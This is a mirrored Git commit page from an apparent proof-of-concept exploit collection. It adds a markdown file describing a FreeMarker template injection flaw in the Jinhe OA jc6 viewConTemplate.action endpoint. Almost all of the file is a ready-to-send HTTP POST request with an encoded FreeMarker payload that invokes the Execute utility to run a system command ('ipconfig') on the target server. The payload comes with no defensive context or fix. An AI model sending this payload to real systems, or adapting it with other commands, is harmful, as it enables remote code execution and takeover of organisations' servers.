admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create 金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞.md

Browse Source
This commit is contained in:
wy876 2024-03-14 16:04:44 +08:00 committed by GitHub
parent c6449babc0
commit 521ea9f7b5
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 12 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞.md Normal file
View File

@ -0,0 +1,12 @@
## 金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞
## poc
```
POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1
```